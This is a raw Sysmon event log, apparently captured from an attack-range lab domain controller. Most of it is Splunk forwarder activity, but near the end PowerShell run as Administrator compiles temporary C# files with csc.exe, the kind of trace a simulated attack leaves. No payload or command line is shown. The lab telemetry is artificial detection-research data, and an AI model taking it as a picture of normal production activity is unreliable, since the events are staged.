Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=002E68F55D12520494293922912AA78C,SHA256=8628F02273200542A6EEC3E3625CC65CE0A730F130E9B4F6700C6C6BA9CAADCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:13.895{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F61AB5BA90091C01FC3746FA3E3D9267,SHA256=525349D92A6CE997334119F42AFA644F4F9C2440ACB5E38349950AA0A196A69E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:13.535{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-7059-603D-4B88-00000000AD01}7980C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:13.535{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:13.535{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:13.535{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:13.535{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:13.535{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-7059-603D-4B88-00000000AD01}7980C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:13.535{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-7059-603D-4B88-00000000AD01}7980C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:13.537{05ADC7E1-7059-603D-4B88-00000000AD01}7980C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001695371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:13.350{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=512FEFCE41CAFA4096F7E6C860E888A4,SHA256=6543AFAB45F31E85B10E3E854D7254B8784DE2A3306278C0035CF101161CE78A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:13.176{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B2DB72D762E082E8D633479D3D627C1,SHA256=6E60AE5BEE9B5CEFC5BE55B8B9816839A07E10A45AEE6731D7069E3262196B0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:13.176{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B32B4F814CBAE0E77A76AE7A0DC7624B,SHA256=60F4CD4E214AC72B99CBAEC90F4964269E92CE8E1B4424ED50E9717BE3D890FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:13.067{05ADC7E1-7058-603D-4A88-00000000AD01}91804608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001695382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:14.067{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F4194EFD3CABC60044A1DF6A67FC40C,SHA256=163C6D900D150375EFA89E7629537E07477AC4C7370FA1222438D720B10BB73B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:15.082{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE0C5A8359F079112F11E9A2F8250BD2,SHA256=EC05CE6940EE58A3CB9111733796B009AE174076E4F0D742C20848BB1CA004D3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:08.439{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55113-false10.0.1.12-8000- 23542300x80000000000000001695385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:16.098{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30DFD9F8B184668FB77F42F9E3850AE1,SHA256=57613C0613383C81BBE665B7AAEFFB19CB385E953737655D1A00008ABF8B78E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:16.098{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=043491306CCD8BA1C34DAEE6C6F50D78,SHA256=08BC8BE60E9A52A3739A6AFD77868D343F2A632D31943486EAAF12B9CBA17925,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:17.114{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4813AE9811671F0642B37E544727C223,SHA256=49F814E1B554970FE51C25E58ACD9BACAB4C975ED86079F16431E7BCE91BAE3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:18.785{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18C159AD1C6991C8EDBC1EF90A5B5233,SHA256=BC1FF934333A58B4B486FA582C1917071B376723EC03BA728E91C102B2BCC87A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:18.148{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17FC6AE12A042A07A34FBF796EF7E8CC,SHA256=DDF56B931CFCEEDD68A894129A6F998C9D1CFA4B374FE402A2C999FB8DCEEC1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:19.801{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5599B15047E397C36B1B1C301F9B5776,SHA256=4391987E8650AB263DF4196495F36D164D108AF5692E25B55229D65670907C9F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:11.126{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local51573- 23542300x80000000000000001695390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:19.176{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A0F79DDD39618FC5C61A2A145982E22,SHA256=97BB5CA96A70C02BBB617E1AF3866754D7CA04EFAE9B8E2F9E1283F6B6ACA953,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.786{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE8733422123DC74C3273AE3E9253802,SHA256=F700A43664B54DD3555898098C76FFDEC3144E07F904643BEBB6D7408490D1C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.753{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\4fuahqur\4fuahqur.0.csMD5=10E9ABF0FAE68083CD0F74B09AFF5337,SHA256=D5A895B2362348B06CF4EEC1C6C912F9BA19E882023309237AA479EDC6E9834E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.753{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\4fuahqur\4fuahqur.outMD5=453BE1AE2DCFA6AF068ABAF183D96241,SHA256=F298BC0051A3FE827EE26F3A5F179DD67E8B9B6AEC21D214AEC7D79A6AEA8926,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.753{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\4fuahqur\4fuahqur.dllMD5=DDABEA8221DCB7EE52611622290841FF,SHA256=73855C8E89D07946E143595467A382626632D6E0B30C5BA80D1317FFF7453A83,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x80000000000000001695435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.753{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\4fuahqur\4fuahqur.cmdlineMD5=8F0E9F078417BBB9D55BC95992CE5D39,SHA256=0016A810B5383A1F59736ABB0EDC82B90C0BB47D864C8359EB023ED9BAF0C285,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.753{05ADC7E1-7060-603D-4E88-00000000AD01}8160ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\4fuahqur\CSC5D1B3DB0F9FD4679A7701ADBE835108E.TMPMD5=AA6149A75E657F397CEBD3C8D0EBF97B,SHA256=4633C0747F37A595F79B8C404E5F33E39C0954851D84D690102D39159B834F91,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001695433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.localDLL2021-03-01 22:53:20.753{05ADC7E1-7060-603D-4E88-00000000AD01}8160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\4fuahqur\4fuahqur.dll2021-03-01 22:53:20.614 23542300x80000000000000001695432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.753{05ADC7E1-7060-603D-4E88-00000000AD01}8160ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\4fuahqur\4fuahqur.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.752{05ADC7E1-7060-603D-4E88-00000000AD01}8160ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\RESC8EB.tmpMD5=46F2E8C1D971F511D0A23FB3E7863211,SHA256=7717153F12A3DF0F44C90E42620A22BADBF0171503D5D7BAD2CE4EF0D9402ACF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.749{05ADC7E1-7060-603D-4F88-00000000AD01}8364ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\RESC8EB.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.740{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7060-603D-4F88-00000000AD01}8364C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.723{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.723{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.723{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.723{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-7060-603D-4F88-00000000AD01}8364C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:20.723{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 